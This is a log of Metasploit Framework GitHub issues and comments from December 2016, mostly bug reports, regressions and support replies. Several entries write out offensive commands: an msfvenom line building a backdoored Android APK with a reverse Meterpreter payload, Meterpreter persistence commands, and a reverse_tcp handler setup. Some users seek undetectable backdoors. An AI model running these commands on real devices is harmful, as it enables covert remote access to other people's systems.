[2016-12-05 21:58] bwatters-r7 commented on #7656
This is a result of a bug-fix where post modules were not filtered correctly in Pro.  The fix relied on using platform_base, which since I tested it only with meterpreter sessions, and it worked great.  Unfortunately, shell sessions do not have that attribute, so something else will have to be found.

@jmartin-r7 is working on a fix that uses 'platform' rather than 'platform_base.'

[2016-12-05 22:07] OJ commented on #7656
Yes, saw the WIP after sending that email. Thanks to all for diving in and
cleaning up after me!

[2016-12-06 13:24] 0xIslamTaha opened #7659 "Inject android payload into an APK isn't working on WAN"
## Steps to reproduce
- Using the following command to produce the paylaod
`msfvenom -x <any_apk> -p android/meterpreter/reverse_http LHOST=<public_IP> LPORT=8080 -o name.apk
`

The session will be closed after almost 5 sec. I tried all available payloads with different source APK and I faced the same issue, However when I use a **LOCAL IP**, Session will be stable and I interact with the victim a

[2016-12-06 15:38] Fl0-0 opened #7660 "uuid and process migration does not work as expected"
## Steps to reproduce

How'd you do it?

1. Generate psh-cmd payload for windows/meterpreter/reverse_tcp_rc4
2. Run exploit/multi/handler with the above payload
3. Run payload on victim
4. uuid and migrate commands does not work:

root@kali:~# msfconsole

  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...

  access: PERMISSION DENIED.

  access: PERMISSION DENIED.

[2016-12-06 15:56] Fl0-0 opened #7661 "psh-cmd payload generation does not work as expected"
## Steps to reproduce

How'd you do it?

1. Generate psh-cmd payload with payload/windows/meterpreter/reverse_tcp_rc4 -> Output corrupted
2. Generate the same payload with msfvenom -> works as expected

root@kali:~# msfconsole

     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____

[2016-12-06 17:21] wvu-r7 commented on #6770
Resolved in #7647.

[2016-12-06 17:21] #6770 closed

[2016-12-06 20:31] bwatters-r7 commented on #7661
Odd..... when I run this, I get a broken shell with Venom and nothing with console.  Do you get a legit shell with the venom output?

My initial guess is that when the UUID got added recently, this crapped on the rc4 key exchange or the rc4 key exchange crapped on the uuid.  There's a lot of exchanging that relies on perfect byte alignment at the start of that handshake, and if anything is off, it

[2016-12-06 20:53] bwatters-r7 commented on #7661
Hrm..... strangely, bind_tcp_rc4 works, though?

[2016-12-06 20:55] #7656 closed

[2016-12-06 21:20] Fl0-0 commented on #7661
The shell is broken with the venom output  ...
=> process migration (x86 to x64 process) and uuid does not work  (see issue #7660).

I've also reported that uuid and process migration are broken in #7660.

Thanks for investigating !

[2016-12-06 22:05] bwatters-r7 commented on #7661
Looks like this is a regression as it works fine in 00e4a8881f5053a9c98dd98027070c08eb1de03d

[2016-12-07 00:04] bwatters-r7 commented on #7660
OK..... this one's definitely a regression that happened with the UUID changes.  The new UUID information tracks the 'bitness' of the current payload.  In the above scenario, you're migrating from an x86 process to an x64 process.  Since we track 'bitness' in the UUID, migrating from an x86 to x64 process requires the regeneration of the UUID to match the new process's 'bitness.'  To do that, we g

[2016-12-07 00:10] OJ commented on #7660
I'm on it!

[2016-12-07 00:41] bwatters-r7 commented on #7661
OK.... my bad.... I'm starting to see.  The last 10 bytes are missing from the one generated by msfconsole...... curious.

[2016-12-07 02:20] bwatters-r7 commented on #7661
OK..... found the problem.  It appears that some recent work to make more readable prompts has resulted in truncating data.  If I revert the following files to commit 8d1c7188730c4f3ef0a7024c363fb439468d1473, it works fine:
lib/rex/ui/text/shell.rb
lib/rex/ui/text/output/stdio.rb
lib/rex/ui/text/input/readline.rb
lib/rex/ui/text/output.rb

Not sure if this is an issue with the terminal reset or if

[2016-12-07 03:10] OJ commented on #7660
The problem here is this commit: https://github.com/rapid7/metasploit-payloads/commit/b50955a92476e797256158db783ba9684db2a902

It removed important code that pushes the UUIDs down with each request.

[2016-12-07 04:38] #7660 closed

[2016-12-07 07:03] Occupy4Elephants opened #7667 "Metasploit's auxiliary/scanner/http/wordpress_ghost_scanner not properly idenfifying application as wordpress."
## Steps to reproduce

I am testing a wordpress website for the GHOST Vulnerability.  The web application is definitely wordpress.
"WordPress web application version 4.1.13 was detected in directory /"
However, when using auxiliary/scanner/http/wordpress_ghost_scanner, I get the response "This is no Wordpress site".  This isn't the first time I've encountered this issue either.
The victim's operat

[2016-12-07 07:26] void-in commented on #7667
Can't reproduce at my end when ran against Wordpress 4.6
[code]
The response from the server status is just an additional vprint_status line I added to be sure. Are you setting the VHOST option in addition to RHOSTS (if the server responds only to specific host requests)?

[2016-12-07 14:26] busterb commented on #7661
It's a good possibility. Thanks for doing the bisect @bwatters-r7

[2016-12-07 15:03] busterb commented on #7660
So sorry, I mistook the importance of that commit!

[2016-12-07 21:21] OJ commented on #7660
No worries mate :) sorted now!

On Dec 8, 2016 1:04 AM, "Brent Cook" <notifications@github.com> wrote:

[2016-12-07 21:49] wchen-r7 opened #7671 "LoginScanner API should handle Metasploit::Model::Login::Status::LOCKED_OUT and Metasploit::Model::Login::Status::DISABLED"
The Metasploit model supports ```Metasploit::Model::Login::Status::LOCKED_OUT```, but there is no action taken in the LoginScanner API if this status is used. Ideally, if an account is locked out, the login scanner should stop trying passwords for the current user, and move on to the next one.

[2016-12-07 23:45] OJ opened #7673 "bypassuac_injection needs updating due to changes in Windows 10"
The `bypassuac_injection` module currently doesn't work on Windows 10 (as of a recent update). MS have patched this vector. We need to update the module so that Windows 10 versions that are new enough are no longer marked as pwnable. Either that or we spend some time adding a new vector that is known to work.

At this point, I think just adding a version check is good enough, because the `bypassua

[2016-12-08 01:04] pbarry-r7 commented on #7471
Hi @Occupy4Elephants!  Yeah, since the issue is with import of an Acunetix output XML file into the MSF DB, I didn't know if you had an XML file handy that you had tested with which showed the vulns not properly being imported (which you would be willing to share with me to help get me moving forward with a failure case).  No worries, I think we might have an Acunetix XML stashed away here I can t

[2016-12-08 08:06] sumsysam141141 opened #7675 "Setting RHOST (without S) value not working via "services ... -R""
Couldn't find any info regarding this issue, sry.

For msf modules, which are using RHOST instead of RHOSTS, it seems like it is not possible to set the RHOST value via "Services ... -R". Is there a fix?
Would be very comfortable if there would be the possiblity to set RHOST via "services" (RC scripts).

Thanks in advance!

## Steps to reproduce
(There are more msf modules affected by this "issue"

[2016-12-08 15:09] raaafaaaaaaa opened #7676 "Persistence Script"
How do i create auto reconnecting backdoor?? Now the persistence script now longer works (meterpreter >run persistence –A –L c:\\ -X 30 –p 443 –r 192.168.1.113).

What should i do??

[2016-12-08 17:22] h00die commented on #7676
A good start would be to give more details on "no longer works".  Is there an error message, something in the logs perhaps that would help track down the issue?

[2016-12-08 17:34] wvu-r7 commented on #7676
This is not a bug.

[2016-12-08 17:34] #7676 closed

[2016-12-08 17:35] wvu-r7 commented on #7676
And Meterpreter scripts are no longer supported.

[2016-12-08 17:38] wvu-r7 commented on #7676
Clarification: until a bug *is* discovered, this is a support issue. Please ask on IRC (#metasploit on freenode) or the Rapid7 Community site (https://community.rapid7.com/). GitHub is for bugs and feature requests. Thanks.

[2016-12-08 17:42] wvu-r7 commented on #7676
FWIW, see if any of the persistence local exploits do what you want. The most direct analog to the Meterpreter script would be ```exploit/windows/local/persistence```.

[2016-12-08 17:47] wvu-r7 commented on #7675
What would happen if you had more than one host? You have three. That won't work with ```RHOST```. Have you tried a resource file?

[2016-12-08 17:53] wvu-r7 commented on #7675
Btw, it's a two-line patch to set ```RHOST``` if only one host was found. A few more lines to have it printing correctly. What do you want to do?

[2016-12-08 18:38] raaafaaaaaaa commented on #7676
Ok thanks ;)

[2016-12-08 18:53] nichlaspro commented on #7638
How to mark this as solved?

[2016-12-08 18:54] h00die commented on #7638
just click "Close" where you respond.

[2016-12-08 18:58] nichlaspro opened #7678 "windows version of Meterpreter is not supported with this Script!"
## Steps to reproduce

How'd you do it?
1. Veil-Evasion to create vba script
2. msfconsole -r and the generated ruby script
3. connect to the session
4. run persistence –U i 5 –p 1720 –r 192.168.0.186

And then i got the error/: "windows version of Meterpreter is not supported with this Script!"

## System stuff
Kali 2016.2
### Metasploit version
Framework: 4.13.1-dev
Console  : 4.13.1-dev

Get th

[2016-12-08 19:03] h00die commented on #7582
@leebaird were you able to test this?

[2016-12-08 19:24] #7638 closed

[2016-12-08 19:25] wchen-r7 commented on #7638
Closed for ya :-)

[2016-12-08 20:28] wchen-r7 opened #7679 "LoginScanner API should abort the module if no credentials are provided"
If the Metasploit::Framework::CredentialCollection object does not actually have any credentials the module can try, it should inform the user about the problem and abort the module.

[2016-12-08 20:31] bwatters-r7 commented on #7582
@jinq102030, Can you verify?

[2016-12-08 20:59] jinq102030 commented on #7582
Yes, it works fine with the fix.  Thanks.

[code]

[2016-12-08 21:19] wchen-r7 commented on #7678
Are you using a Meterpreter script? Those scripts are no longer supported. You should try exploits/windows/local/persistence.

[2016-12-09 01:52] nichlaspro commented on #7678
Thanks for three quick answer! Your are really a bless to this forum ;-) anyway, what specifically so I have to type, like "run exploits/Windows/local/persistence"? Or what..

[2016-12-09 02:02] OJ commented on #7678
Technically this isn't a forum. You should be using community.rapid7.com for general support rather than submitting Github issues. Github is for bug reports.

[2016-12-09 02:42] h00die opened #7683 "Module Request: CVE-2016-8655 (linux priv esc)"
http://seclists.org/oss-sec/2016/q4/621

Includes the c code, and we've imported other thing by "rebel" for linux priv esc, and they have seemed solid.

I wont have time for a week or two to get to this, so anyone else who wants to, be my guest!

[2016-12-09 03:49] aoighost opened #7684 "if you call msfrpc methods with incorrect arguments (e.g. string instead of hash), the resulting backtrace does not help diagnose the problem"
## Steps to reproduce

How'd you do it?

Try to call db.hosts from rpc. Note this appears to be a problem rife in the code related to db and rpc.

## Expected behavior

It should return a list of hosts.

## Current behavior

Upon trying to gather a list of hosts or other things in the database, an error like this occurs:
https://i.imgur.com/GP4cr0S.png

## System stuff

### Metasploit version

Fra

[2016-12-09 04:36] bcook-r7 commented on #7684
Hi, got a way to reproduce with msfrpc ? Here's a sample run that seems to work:
[code]

Are you passing db.hosts a hash with workspace: specified as a key? It seems that if you're not exact about passing it the right argument type, it doesn't handle argument parsing very well. I don't think this has anything to do with obsolete ruby methods.

[2016-12-09 06:51] aoighost commented on #7684
I'll do more experimentation, I'm using a derivative of https://github.com/VolatileMindsLLC/metasploit-sharp and trying to get it working and expanded for use in a tool I'm working on, let me take a further look.

[2016-12-09 06:52] aoighost commented on #7684
This is my current C# code:
[code]

[2016-12-09 07:10] aoighost commented on #7684
Here is my current call code:

[code]

[2016-12-09 07:25] Occupy4Elephants commented on #7471
sure I'd be happy to provide you with one privately.  Is there a way to do that?  Sorry, I'm really new here/

[2016-12-09 07:35] maaaaz opened #7686 "Update auxiliary/scanner/telephony/wardial to work with modern Ruby"
## Steps to reproduce

How'd you do it?

1. use `auxiliary/scanner/telephony/wardial`
2. set your different options
3. exploit

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Expected behavior

What should happen?
It should wardial

## Current beh

[2016-12-09 07:41] aoighost commented on #7684
I've confirmed it is tossing a workspace value of "default" to the variable, I'm not sure why it's breaking.

[2016-12-09 08:01] nichlaspro commented on #7678
Oh my bad :)

[2016-12-09 10:18] Sirat18 opened #7687 "NoMethodError undefined method `chop' for nil:NilClass when using SessionLogging"
## Steps to reproduce

When using session logging, session interaction fails with nil-pointer error:

[code]

## Expected behavior

Logging Sink should catch msg to be nil. Logging message should not be nil.

## Current behavior

Session interaction fails with nil-pointer error, session irresponsive.

## System stuff

### Metasploit version
Framework: 4.13.1-dev
Console  : 4.13.1-dev

### I instal

[2016-12-09 14:56] sumsysam141141 commented on #7675
hey! thanks for the Response.
my issue is:
at the beginning i'm importing scan results from several XML files via db_import.
the rc script then automatically sets the RHOSTS value, the msf module runs, done.
however, when the module is using RHOST instead of RHOSTS, setting the "Targets" via "Services... -R" is not working, meaning the RHOST value stays empty.
what i want to do is: being able to s

[2016-12-09 15:08] busterb commented on #7686
Looks like a problem with the telephony upstream gem, which hasn't had an update in 2 years.

[code]

[2016-12-09 15:38] bcook-r7 commented on #7684
I think you're calling the RPC API incorrectly though. The argument to db.hosts is not a string, it's a dictionary like this: {"workspace": "default"}. This has nothing to do with metasploit calling incorrect ruby methods I believe.

[2016-12-09 15:40] bcook-r7 commented on #7684
I can get the same error from msfrpc if I call the method like this:

rpc.call('db.hosts', "default")

rather than like this:

rpc.call('db.hosts', {workspace: "default"})

[2016-12-09 16:38] wvu-r7 commented on #7675
You have to loop a module run setting ```RHOST``` to a single host every time. The parameter simply can't take more than one host. It sucks. It would be nice if everything could take ```RHOSTS```. That's why I suggested a resource file/script. :)

[2016-12-09 16:46] #7661 closed

[2016-12-09 16:48] wvu-r7 commented on #7678
Similar to #7676. Closing. Try the local exploit, @nichlaspro!

[2016-12-09 16:48] #7678 closed

[2016-12-09 16:49] wvu-r7 commented on #7683
Tentatively grabbing this. Will unassign if I don't get to it before @h00die returns.

[2016-12-09 16:52] wvu-r7 commented on #7683
Known to work against ```4.4.0-45-generic #66~14.04.1``` in the wild.

[2016-12-09 17:51] egypt commented on #7675
@wvu-r7 yes, it's a bummer that exploits can't work against everything and always get you shells. `RHOSTS` for exploits is nevertheless a bad idea unless we can somehow guarantee that the target, payload, and handler settings will work for all the victims. Something like that may be possible for some exploits, but definitely not generically for all exploits.

[2016-12-09 17:54] egypt commented on #7614
As @wchen-r7 alluded to, this would require a major architectural change. The handler is not the only problem. Payload settings and `TARGET` are also dependent on the victim and many exploits cannot know which target to select.

If the handler problem is solved, it may be possible for something like this to work for some exploits, or even classes of exploits, but I don't think it's possible to gen

[2016-12-09 18:54] wvu-r7 commented on #7675
@egypt: I understand that. We've talked about it. At length. I'm trying to empathize with @sumsysam141141 and provide a solution. I think we're done here.

[2016-12-09 18:54] #7675 closed

[2016-12-09 21:15] jinq102030 opened #7689 "The number of found users in drupal_views_user_enum module is not accurate"
## Steps to reproduce

How'd you do it?

1. `run auxiliary/scanner/http/drupal_views_user_enum`
2. `set RHOSTS 127.0.0.1`
3.  `run`
[code]
## Expected behavior

Should report accurate number of users. In this case 4, not 2.

[2016-12-09 22:02] h00die commented on #7683
Better hands it could not be in.

[2016-12-09 22:08] #7463 closed

[2016-12-09 22:19] jinq102030 opened #7691 "Silent exit when running module error_sql_injection"
## Steps to reproduce

1. `use auxiliary/scanner/http/error_sql_injection`
2. `set RHOSTS 127.0.0.1`
3. `run`

Silent exit, no traffic sent.

## Expected behavior

Should give an error message if user didn't config a necessary parameter.  This is especially bad when `show missing` shows there is nothing missing.

[2016-12-09 22:34] jinq102030 opened #7693 "enhance request, more informative error message"
## Steps to reproduce

When run a wrong command (note the extra "." at the end of the module), the error message should be more explicit

[code]

## Expected behavior
Would be nice if MSF could tell user that there is an extra "." at the end of the module or extra ".rb" at the end of module

[2016-12-09 23:19] #7691 closed

[2016-12-09 23:19] #7689 closed

[2016-12-09 23:20] wvu-r7 commented on #7689
Fixed in #7690.

[2016-12-09 23:20] wvu-r7 commented on #7691
Fixed in #7692.

[2016-12-09 23:39] wvu-r7 commented on #7686
@maaaaz: Have you tried WarVOX? Telephony was added to Metasploit shortly after the first release of WarVOX, but WarVOX is under semi-continued development, last I heard. @hdm?

[2016-12-10 03:44] h00die commented on #7582
awesome, i'll get to this this weekend and see about implementing it in a few of the ftp modules that are similar!

[2016-12-10 10:04] maaaaz commented on #7686
@wvu-r7 yes I tried WarVOX but it does not meet my need as I need analog wardialing and WarVOX only supports SIP providers.

That would be cool to fix that module.
Cheers.

[2016-12-10 11:42] xxxcrow commented on #6740
guys? where our metaphor in metasploid? :\ in september? :о

[2016-12-10 13:29] xxxcrow opened #7696 "my devices not supported? :О"
i've check this vulnerable on my device, critical:9 :)
but i can't exploit this :С
(i've tested on 2 devices)(version of android: 4.1.2)
[code]

i use msf on kali

[2016-12-10 13:39] h00die commented on #7696
what devices?

[2016-12-10 13:40] h00die commented on #7696
This is for reporting bugs, if this is a support issue Please ask on IRC (#metasploit on freenode) or the Rapid7 Community site (https://community.rapid7.com/). GitHub is for bugs and feature requests. Thanks.

[2016-12-10 15:19] xxxcrow commented on #7696
device: (china) Jiayu JY-G2 (4.1.2 custom:MAUI)

[2016-12-10 15:27] h00die commented on #7696
This is expected behavior https://github.com/rapid7/metasploit-framework/blob/d8f59a9d622ff37db9392bbd104d7456f2ff8c7e/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb#L991
If this is a support request to add additional devices, see my previous comment. https://github.com/rapid7/metasploit-framework/issues/7696#issuecomment-266208996

[2016-12-10 15:27] #7696 closed

[2016-12-10 17:54] wvu-r7 commented on #6740
@xxxcrow: Landed in #7357. What's your real question?

[2016-12-10 17:54] wvu-r7 commented on #7686
Ahh, gotcha.

[2016-12-10 20:42] h00die commented on #7693
Would the best method to go about this be to say split on / , and if a . is located in the last string, strip it and anything right of it off?
Python pseudo code:
[code]
I'm not aware of any module names with periods in them, so this would be safe as far as my VERY limited knowledge would go

[2016-12-11 03:03] h00die opened #7698 "Module Request: Netgear R7000 and R6400 Command Injection"
https://www.kb.cert.org/vuls/id/582384
https://www.exploit-db.com/exploits/40889/

Looks... trivial....

[2016-12-11 16:43] MrMalfunction opened #7700 "Metaspoilt apk"
I am a Rookie at Kali.
Well I used the steps here http://null-byte.wonderhowto.com/how-to/hack-android-using-kali-updated-and-faq-0164704.
But the app gets installed on the phone but it does not work in the background.
I used Metaspoilt in Kali(live boot).
The phone and my computer are connected on the same network.
Please help.

[2016-12-12 01:01] jaguarmoves opened #7701 "Meterpreter> run persistence .. i got an error"
## Steps to reproduce

How'd you do it?

1. ...
I made the payload from Veil-evasion
python/shellcode_inject/aes_encrypt
windows/meterpreter/reverse_tcp
========================================
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.10
set lport 4444
exploit..
======================
meterpreter > sysinfo
Computer        : Envision-pc
OS

[2016-12-12 01:08] OJ commented on #7701
[This is the problem](https://github.com/rapid7/metasploit-framework/blob/master/scripts/meterpreter/persistence.rb#L230):
[code]

Recent changes to arch/platform resulted in a regression here.

[2016-12-12 01:12] jaguarmoves commented on #7701
@OJ what do you mean??
was the problem on my payload used or the metasploit??

[2016-12-12 01:23] OJ commented on #7701
It was Metasploit that was broken, the persistence script was relying on platform strings that are no long relevant.

I've submitted a PR that fixes it.

[2016-12-12 01:24] OJ commented on #7701
Generally the scripts are considered to be out of date these days. It's better to run a post module such as https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/persistence_exe.rb

[2016-12-12 01:25] jaguarmoves commented on #7701
okay thank you so much master that was a relief

[2016-12-12 01:41] wvu-r7 commented on #7701
Fixed in #7702.

[2016-12-12 01:41] #7701 closed

[2016-12-12 01:41] OJ commented on #7701
It'll be a while before the fix appears in Kali though.

[2016-12-12 01:42] OJ commented on #7676
This has now been fixed in #7702.

[2016-12-12 01:42] OJ commented on #7678
This has now been fixed in #7702.

[2016-12-12 01:47] jaguarmoves commented on #7701
@OJ a.. im a noobie i dont know what you mean by this "It's better to run a post module such as https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/persistence_exe.rb"

[2016-12-12 02:13] wvu-r7 commented on #7701
@jaguarmoves: You run a post module the same way you would an exploit or aux module.

[2016-12-12 02:35] jaguarmoves commented on #7701
now i know but my question is does that persistence_exe module undetectable ?

[2016-12-12 03:21] jaguarmoves commented on #7701
@OJ i use this https://github.com/rapid7/metasploit-framework/pull/7702/commits/462e91ed224a846e729f0c329e276c37c70bf107#diff-1c703cf024e4f0ada01cf5224d5aca06

thanks it work

[2016-12-12 03:27] thecarterb opened #7703 "msfvenom .app export update"
## Description

No doubt this is a feature request that I would be happy to contribute to but don't have working knowledge of the platform to produce it on my own. I think we _all_ have wanted to get a `.app` to open a session, but msfvenom only produces `PPC` applications. What I think would really help a lot of us is if the `.app` executable format was updated to work on modern day macs instead

[2016-12-12 04:26] bcook-r7 commented on #7700
Sorry, github is not the place to ask for support. Try community.rapid7.com

[2016-12-12 04:26] #7700 closed

[2016-12-12 05:45] Chiggins commented on #7683
So I've spent some time going through some kernels trying to get the C code to work, and so far have come to no avail. Tried a few kernels with Ubuntu 16.04 including `4.4.0-51-generic #72-Ubuntu` as shown in the C code example, and also Ubuntu 14.04.1 with `4.4.0-45-generic #66~14.04.1-Ubuntu` like @wvu-r7 had mentioned. In hind sight I probably should've documented the kernel version I tried, bu

[2016-12-12 05:52] wvu-r7 commented on #7683
Welp.

[2016-12-12 06:04] wvu-r7 commented on #7683
For the record, my test case was on a real box, and it wasn't even my test case. We've all been testing in VMs. No idea if that makes a difference, but it could.

I've unassigned myself pending further investigation. Thanks. Feel free to grab this!

[2016-12-12 10:22] h00die commented on #7683
https://www.exploit-db.com/exploits/40871/
for the record, they didn't verify it either.  May be worth a ping over to EDB to see if they tested it over there and sync up

[2016-12-12 10:24] h00die commented on #7683
i'll try to pull up a VM or 3 tonight and see if i have any success

[2016-12-12 15:02] jinq102030 commented on #7582
Cool.

[2016-12-12 15:03] jinq102030 commented on #7693
There is a good solution too.

[2016-12-12 15:55] wvu-r7 commented on #7683
Thanks, @h00die!

[2016-12-12 17:40] darkbushido commented on #7555
You should run ```rake db:test:prepare``` before running ```rspec spec/lib/msf/db_manager_spec.rb```

I'm going to create a pull request that will let you run ```rake spec SPEC=spec/lib/msf/db_manager_spec.rb``` after the change it will auto run rake db:test:prepare

[2016-12-12 17:50] Chiggins commented on #7683
I reached out to someone at EDB, just waiting for them to ping me back on IRC.

I had a little bit of free time this morning so I gave this another shot on the kernel versions the header of the C code say, and none of them worked. Those ones are `Ubuntu 16.04: 4.4.0-51-generic`, `Ubuntu 16.04: 4.4.0-47-generic` and `Ubuntu 16.04: 4.4.0-36-generic`.

[2016-12-12 20:20] wvu-r7 commented on #7642
@jnqpblc: Please let me know if https://github.com/wvu-r7/metasploit-framework/tree/feature/sort suits your fancy.

[2016-12-13 13:56] yywf opened #7705 "macbook install metasploit-framework, but exec msfconsole fail."
please help me.   my steps:
1. git clone 'this branch‘
2. ./msfupdate and install packages from error information
3. ./msfconsole  error as follows

➜  metasploit-framework git:(master) ✗ msfconsole
/usr/local/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/bcrypt-3.1.11/lib/bcrypt.rb:16:in `require': incompatible library version - /usr/local/share/metasploit-framework/vendor/bundle/ruby/

[2016-12-13 14:09] void-in commented on #7705
Download the appropriate installer from https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers. If you encounter any problem during the installation, please use https://community.rapid7.com as this place is to report bugs and feature requests, not support queries. Thanks

[2016-12-13 14:09] #7705 closed

[2016-12-13 15:17] thecarterb commented on #7698
@h00die I'm working on this right now. I'll create a pull by this weekend for the module inclusion.

[2016-12-13 15:44] wvu-r7 commented on #7698
@thecarterb: Great, thanks. Tag me on the PR so I can review it. One fewer module for me to write...

[2016-12-13 15:46] thecarterb commented on #7698
@wvu-r7 Alright, will do.

[2016-12-13 16:49] Chiggins commented on #7683
Thanks to @g0tmi1k, came across this link with a little more regarding the exploit: https://kosukeshimofuji.jp/2016/12/09/CVE-2016-8655/

But, even though I'm on Ubuntu 16.04.1 LTS with `4.4.0-51-generic #72-Ubuntu`, and used `setcap`, still no dice for me.

[2016-12-13 20:19] Occupy4Elephants commented on #7667
dammit! WTF?  Thanks for your help.  Who knows what's going on.  I don't know why it wouldn't id the app as wordpress when it absolutely is.  Is there any other reason this may be happening?  So frustrating.  Also, I have the latest release of Kali, just downloaded it last week.  I didn't know it was called something different.  Thanks for your help. xo

[2016-12-13 21:39] PartyImp opened #7707 "nexpose_sites and nexpose_site_devices commands return incorrect risk factor"
Greetings!

## Steps to reproduce

0. `./msfconsole`
1. `load nexpose`
2. `nexpose_connect user pw host port ok`
3. `nexpose_sites`

the scores and risk factor are 0.0:

[code]

This happens because the Nexpose API responds with keys like `riskscore` instead of `risk_score`. Inspection of the response object confirms this:

[code]

the `nexpose_site_devices` command also parses the xml incorrectly

[2016-12-14 00:52] yywf opened #7708 "macbook install metasploit-framework use OS X quick installation , but exec msfconsole fail."
yesterday I use void-in 's method to install metasploit , link is 'https://github.com/rapid7/metasploit-framework/issues/7705'. and follow link is 'https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers'

details steps is.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 75

[2016-12-14 00:54] thecarterb commented on #7708
As the error code says: `Could not find 'bundler'`

You need to install the `bundler` gem by running the following command: `gem install bundler`, then run `bundle install`

[2016-12-14 01:00] bcook-r7 commented on #7708
It should not be required to install any gems with this method!

It looks like you are not actually running the binaries that come with the package. Try typing 'which msfconsole' and could you show what the output is?

[2016-12-14 01:02] bcook-r7 commented on #7708
I suspect you have actually installed metasploit multiple times in multiple places, and this error is not coming from the omnibus package, but some other installation. Please try running msfconsole like this instead:

/opt/metasploit-framework/bin/msfconsole

[2016-12-14 03:49] bcook-r7 commented on #7708
If you have any further issues, please see community.rapid7.com

[2016-12-14 03:49] #7708 closed

[2016-12-14 06:46] OJ opened #7709 "New console changes gobble the last line of meterpreter command output"
This issue appears to have come about as a result of the latest async console output changes. The problem is that any output from a Meterpreter command (such as `cat C:\file.txt`) that ends up without a newline at the end gets gobbled by this new change.

## Replication

* Create a file on a Windows system that has text in it but does NOT end in a newline (eg. `C:\file.txt`).
* Get a meterpreter s

[2016-12-14 07:01] OJ commented on #7709
This might also be mucking with home/end keys as well.

[2016-12-14 07:52] OJ opened #7710 "Stageless Meterpreter Payload Proxy options aren't present"
The `PayloadProxy*` settings that are available in staged http/s payloads aren't available in stageless. These settings need to be added so that these options can be set for stageless as well as staged.

[2016-12-14 08:13] yywf commented on #7708
thanks for you help. @all . I am working now . and I will do as you say when i go home.

[2016-12-14 17:35] bwatters-r7 commented on #7709
@dmaloney-r7
<sigh>

[2016-12-14 17:48] bwatters-r7 commented on #7709
@OJ Dumb question; do you have fix https://github.com/rapid7/metasploit-framework/pull/7670 merged in?

[2016-12-15 00:50] yywf commented on #7708
I remove all installation, and use OS X graphical installation. and info as follow

➜  bin ls
msfbinscan  msfdb       msfpescan   msfrpc      msfvenom
msfconsole  msfelfscan  msfremove   msfrpcd
msfd        msfmachscan msfrop      msfupdate
➜  bin which is msfconsole
is not found
msfconsole not found
➜  bin ./msfconsole
Could not find rake-12.0.0 in any of the sources
Run `bundle install` to insta

[2016-12-15 03:43] OJ commented on #7709
@bwatters-r7 yes I do indeedy.

[2016-12-15 03:52] nixawk commented on #7698
@thecarterb If possible, please extract the bulb firmware, and analysis **/usr/sbin/httpd**.

[code]

## HTTP METHOD: POST

[code]

## HTTP METHOD: OPTIONS

[code]

## HTTP METHOD: GET
command_format_v33 = "/www/cgi-bin/%s > /tmp/cgi_result";
command_buff_v34 = (char *)&command_buff_PTR_v45;
[code]
sprintf(command_buff_v34, command_format_v33, &buff_PTR_v50);
system((const char *)&command_buff_PTR

[2016-12-15 04:35] busterb commented on #7708
no, please run the command:
[code]
not 'which is msfconsole'

[2016-12-15 06:15] nixawk commented on #7698
(Security Advisory for VU 582384)[http://kb.netgear.com/000036386/CVE-2016-582384?cid=wmt_netgear_organic] releases beta firmwares which fixes the command injection vulnerability, but the patch is bypassed. Please see the patch detail:

[code]

command can be injected in another way. (without **;** **`** **$** **..**)

[2016-12-15 11:33] thecarterb commented on #7698
@nixawk I can try, but I think your first suggestion might be better as its own module. And if I do implement it, would I compile the code on the attackers system or use something like Ruby Inline?

[2016-12-15 11:38] void-in commented on #7707
@PartyImp You can follow https://github.com/rapid7/metasploit-framework/wiki/Contributing-to-Metasploit to start contributing. Have a loot at the currently opened PRs as well to get a feel. If you encounter any problem. update this thread and we would be happy to help.

[2016-12-15 12:50] nixawk commented on #7698
@thecarterb  A payload server may be good choice.

1.  [ server ] <---- request ----- [ client ]

2. [ server ]  ----> Payload ----> [ client ]

[2016-12-15 13:08] thecarterb commented on #7698
@nixawk Is there another module that uses this structure?

[2016-12-15 15:58] timwr commented on #7659
I can't reproduce this. Can you provide more information? e.g:
Does this only occur on reverse_http payloads (as opposed to reverse_tcp)
Does this only occur during injection (with -x)?
Does the payload reconnect (you can also use the `meterpreter> sleep 1` command to test this)?
Please also double check your setting the correct (external) IP in both the handler and the payload.

[2016-12-15 17:44] dmaloney-r7 commented on #7709
@bwatters-r7 *sigh* indeed

[2016-12-15 19:22] dmaloney-r7 commented on #7709
@oj cannot reproduce
[code]

![screen shot 2016-12-15 at 1 21 48 pm](https://cloud.githubusercontent.com/assets/1146440/21238663/7d59aa78-c2c9-11e6-9b7f-da93a3e04a01.png)

This sounds like the exact problem fixed by https://github.com/rapid7/metasploit-framework/pull/7670

[2016-12-15 20:44] #7687 closed

[2016-12-15 21:02] Naramsim opened #7714 "keep meterpreter commands alive"
## Steps to reproduce

How'd you do it?

1. start a meterpreter session
2. execute a custom meterpreter script ([like](https://www.offensive-security.com/metasploit-unleashed/functions/#Execute_List_of_Commands))

## Expected behavior

What should happen?

The commands in the meterpreter script should continue to run, even if the meterpreter session get closed (maybe the server went down)

## Curr

[2016-12-15 23:09] femskey commented on #7036
database appears to be already configured, skipping initialization
/usr/lib/ruby/2.3.0/openssl.rb:13:in `require': /usr/lib/i386-linux-gnu/ruby/2.3.0/openssl.so: symbol SSLv2_method, version OPENSSL_1.0.2d not defined in file libssl.so.1.0.2 with link time reference - /usr/lib/i386-linux-gnu/ruby/2.3.0/openssl.so (LoadError)
	from /usr/lib/ruby/2.3.0/openssl.rb:13:in `<top (required)>'
	from /usr/

[2016-12-16 01:04] OJ commented on #7714
Are you suggesting that commands should still execute inside Meterpreter even when it's no longer running?

[2016-12-16 02:13] scriptkittie commented on #7693
@h00die I think that if this enhancement is going forward, it should handle more than just checking for periods. The method you describe is great, maybe it could check for other things as well, other than just periods?

[2016-12-16 02:53] h00die commented on #7693
